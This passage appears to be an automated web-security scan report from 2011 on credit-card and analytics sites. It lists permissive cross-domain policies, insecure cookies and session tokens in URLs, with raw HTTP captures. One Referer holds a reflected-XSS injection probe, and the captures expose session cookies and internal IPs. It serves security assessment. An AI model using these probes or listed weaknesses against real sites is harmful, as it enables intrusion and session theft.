Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: creditcards.citicards.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Server:
Date: Fri, 17 Jun 2011 12:13:02 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 9 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://americanexpress.122.2o7.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://cctrkom.creditcards.com/clientaccesspolicy.xml
http://creditcardscom.112.2o7.net/clientaccesspolicy.xml
http://integrate.112.2o7.net/clientaccesspolicy.xml
http://metrics.citibank.com/clientaccesspolicy.xml
http://omn.americanexpress.com/clientaccesspolicy.xml
http://pixel.33across.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Fri, 17 Jun 2011 12:04:21 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://americanexpress.122.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://americanexpress.122.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: americanexpress.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:44 GMT
Server: Omniture DC/2.0.0
xserver: www276
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Sat, 18 Jun 2011 11:59:07 GMT
Date: Fri, 17 Jun 2011 11:59:07 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.4. http://cctrkom.creditcards.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cctrkom.creditcards.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cctrkom.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:35 GMT
Server: Omniture DC/2.0.0
xserver: www433
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://creditcardscom.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://creditcardscom.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: creditcardscom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:08 GMT
Server: Omniture DC/2.0.0
xserver: www175
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://integrate.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://integrate.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:28 GMT
Server: Omniture DC/2.0.0
xserver: www98
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://metrics.citibank.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.citibank.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:13:58 GMT
Server: Omniture DC/2.0.0
xserver: www17
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.8. http://omn.americanexpress.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://omn.americanexpress.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omn.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:33 GMT
Server: Omniture DC/2.0.0
xserver: www260
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.9. http://pixel.33across.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012417000"
Last-Modified: Fri, 18 Feb 2011 07:00:17 GMT
Content-Type: application/xml
Content-Length: 335
Date: Fri, 17 Jun 2011 11:59:08 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

6. SSL cookie without secure flag set previous next
There are 7 instances of this issue:

https://application.capitalone.com/icoreapp/jsp/landing.jsp
https://www.applyonlinenow.com/USCCapp/Ctl/display
https://www.applyonlinenow.com/USCCapp/Ctl/entry
https://www.applyonlinenow.com/USCCapp/Ctl/validate
https://www.discovercard.com/cardmembersvcs/registration/reg/goto
https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0
https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

6.1. https://application.capitalone.com/icoreapp/jsp/landing.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/jsp/landing.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=7R2PN7BWkq05FB2nsTl1DjYPsgvXT2vPp222kzwTp1ZqXy1729fJ!-968881363; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; WWWJSESSIONID=0m7BN7BN6nNGhzBdpP67y3ncv2YRsjl9XPL7tTKvfbMXGSdhPzpS!639091316!1546850483; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:22 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=7R2PN7BWkq05FB2nsTl1DjYPsgvXT2vPp222kzwTp1ZqXy1729fJ!-968881363; path=/
X-Powered-By: JSF/1.2
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 89171

<html>
   <head>
       <title></title>
       <link href='/icoreapp/css/apex.css' type="text/css" rel="stylesheet">
       <script language="JavaScript" src='/icoreapp/js/customer_info.js'></script>
       <sc
...[SNIP]...

6.2. https://www.applyonlinenow.com/USCCapp/Ctl/display previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/display

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0000M0rR0J2Y8xxLnoLQet1F3rI:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/display?pageid=popup&textid=faq1 HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000ldjuhhHR5CpQg0jU5xYLxtN:-1; mbox=check#true#1308312903|session#1308312842615-157926#1308314703; cmRS=&t1=1308312848756&t2=1308312855857&t3=1308313519051&lti=1308313519051&ln=&hr=javascript%3AOpenWin%28display%3Fpageid%3Dpopup%26textid%3Dfaq1%2C395%2C279%2Cnewwin%29&fti=&fn=CRD%20APP%20-%20ao_Your%20Information%20-%20Viewed_application.formApply%3A0%3B&ac=&fd=&uer=&fu=&pi=Application%3A%20CRD%20APP%20-%20ao%20Step%3A%20100%20%28Your%20Information%20-%20Viewed%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394&ul=https%3A//www.applyonlinenow.com/USCCapp/Ctl/entry%3Fsc%3DUABJCQ%26GV10%3DH%7C267%7CK49670%26GV1%3DH%257C143%257Cgan_631529122&rf=http%3A//www.creditcards.com/oc/%3Fpid%3D22065113%26pg%3D11%26pgpos%3D5

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 12:25:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://www.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000M0rR0J2Y8xxLnoLQet1F3rI:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US

6.3. https://www.applyonlinenow.com/USCCapp/Ctl/entry previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0000AcsFbEU7BtYedf8xPa1--z8:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122 HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22065113&pg=11&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1308312842615-157926#1308315393|check#true#1308313593; JSESSIONID=0000KHM8oZE33MDRyWsCy2o6Q6w:-1; cmRS=&t1=1308313536718&t2=1308313540976&t3=1308313571532&t4=1308313531074&lti=1308313562826&ln=&hr=javascript%3AOpenWin%28display%3Fpageid%3Dpopup%26textid%3Dmaiden%2C395%2C279%2Cnewwin%29&fti=1308313569671&fn=CRD%20APP%20-%20ao_Your%20Information%20-%20Viewed_application.formApply%3A0%3B&ac=0:S&fd=0%3A75%3Aao.application.formApply.verifyButton_BUTTON%3B&uer=&fu=validate&pi=Application%3A%20CRD%20APP%20-%20ao%20Step%3A%20100%20%28Your%20Information%20-%20Viewed%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394&ul=https%3A//www.applyonlinenow.com/USCCapp/Ctl/entry%3Fsc%3DUABJCQ%26GV10%3DH%7C267%7CK49670%26GV1%3DH%257C143%257Cgan_631529122&rf=http%3A//www.creditcards.com/oc/%3Fpid%3D22065113%26pg%3D11%26pgpos%3D5

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:26:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000AcsFbEU7BtYedf8xPa1--z8:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 86023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Credit
...[SNIP]...

6.4. https://www.applyonlinenow.com/USCCapp/Ctl/validate previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/validate

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0000txUoQLMgfpEEZGH4aujROUY:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /USCCapp/Ctl/validate HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122
Content-Length: 4675
Cache-Control: max-age=0
Origin: https://www.applyonlinenow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1308312842615-157926#1308315393|check#true#1308313593; JSESSIONID=0000kcxk_ZzmjUGzrYQ-ZzvwVZK:-1; cmRS=&t1=1308313536718&t2=1308313540976&t3=1308313569672&t4=1308313531074&lti=1308313562826&ln=&hr=javascript%3AOpenWin%28display%3Fpageid%3Dpopup%26textid%3Dmaiden%2C395%2C279%2Cnewwin%29&fti=1308313569671&fn=CRD%20APP%20-%20ao_Your%20Information%20-%20Viewed_application.formApply%3A0%3B&ac=0:S&fd=0%3A75%3Aao.application.formApply.verifyButton_BUTTON%3B&uer=&fu=validate&pi=Application%3A%20CRD%20APP%20-%20ao%20Step%3A%20100%20%28Your%20Information%20-%20Viewed%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394&ul=https%3A//www.applyonlinenow.com/USCCapp/Ctl/entry%3Fsc%3DUABJCQ%26GV10%3DH%7C267%7CK49670%26GV1%3DH%257C143%257Cgan_631529122&rf=http%3A//www.creditcards.com/oc/%3Fpid%3D22065113%26pg%3D11%26pgpos%3D5

application.formApply.customerNameInputSection.txtFirstNameError.firstName=&application.formApply.customerNameInputSection.txtMiddleNameError.middleName=&application.formApply.customerNameInputSection
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 12:26:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://www.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000txUoQLMgfpEEZGH4aujROUY:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US

6.5. https://www.discovercard.com/cardmembersvcs/registration/reg/goto previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/registration/reg/goto

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wfs=workflow.pwdreset=continue;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cardmembersvcs/registration/reg/goto?forwardName=pwdresethome HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/registration/reg/goto?forwardName=forgotuserid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346; __utmz=259108511.1308313866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=259108511.91682261.1308313866.1308313866.1308313866.1; __utmc=259108511; __utmb=259108511.1.10.1308313866; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i:13ffb8sd7

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:32:24 GMT
Server: Apache
x-wily-info: Clear guid=9D9683510A07140B100E100E1D67CFB3
x-wily-servlet: Encrypt1 U+w0Pb5QTikwsT8iugvWOMCANIqeNSTiiFp2WOdcpH/2R7XG08DKCgKmNAlms0VtyDMtmWESJZA6dRswzKWhwSiymFq5SPemEUNcV3V+IZG5n//8emsbw1/fj6O/yY/mQtuDXg3OS4VCDbLIO0Zp4iO8VlAY/3lQskgHujKXSbsGtdUWPoMkkXFwZWL9zrMM
Set-Cookie: wfs=workflow.pwdreset=continue;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: private, no-cache=set-cookie
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 16708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

6.6. https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/simplycash-business-credit-card/apply/42732-9-0

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:06:48 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business-card-application/simplycash-business-credit-card/apply/42732-9-0 HTTP/1.1
Host: www262.americanexpress.com
Connection: keep-alive
Referer: http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975; ngaopen_JSESSIONID=0000-Dg92efHFT7uhn3Nw5fe1Yr:1525kj48o; TrackingId=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:48 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:06:48 GMT; Path=/; Domain=.americanexpress.com
Cache-Control: no-store, no-cache=set-cookie
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 101106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en">

...[SNIP]...

6.7. https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:03:57 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/?intlink=us-scandplum-plan1 HTTP/1.1
Host: www262.americanexpress.com
Connection: keep-alive
Referer: http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1a69c8%22-alert(document.location)-%2236ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975; ngaopen_JSESSIONID=0000-Dg92efHFT7uhn3Nw5fe1Yr:1525kj48o

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:03:56 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:03:57 GMT; Path=/; Domain=.americanexpress.com
Cache-Control: no-store, no-cache=set-cookie
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 96151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en">

...[SNIP]...

7. Session token in URL previous next
There are 12 instances of this issue:

/icoreapp/images/custinfo/apply-by-phone-won.gif
/icoreapp/images/custinfo/btn_continue.gif
/icoreapp/images/custinfo/form_add_btm.gif
/icoreapp/images/custinfo/form_add_top.gif
/icoreapp/images/custinfo/form_btm_bg.gif
/icoreapp/images/custinfo/form_top_bg.gif
/icoreapp/images/custinfo/progress_step1_enter_info.gif
/icoreapp/images/custinfo/title-your-business-credit-card.gif
/icoreapp/images/custinfo/title_tell_about_biz.gif
/icoreapp/images/custinfo/title_tell_about_yourself.gif
/icoreapp/images/icons/icon_secure_small.gif
/icoreapp/images/icons/icon_tooltip.gif

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. https://application.capitalone.com/icoreapp/images/custinfo/apply-by-phone-won.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/apply-by-phone-won.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/apply-by-phone-won.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

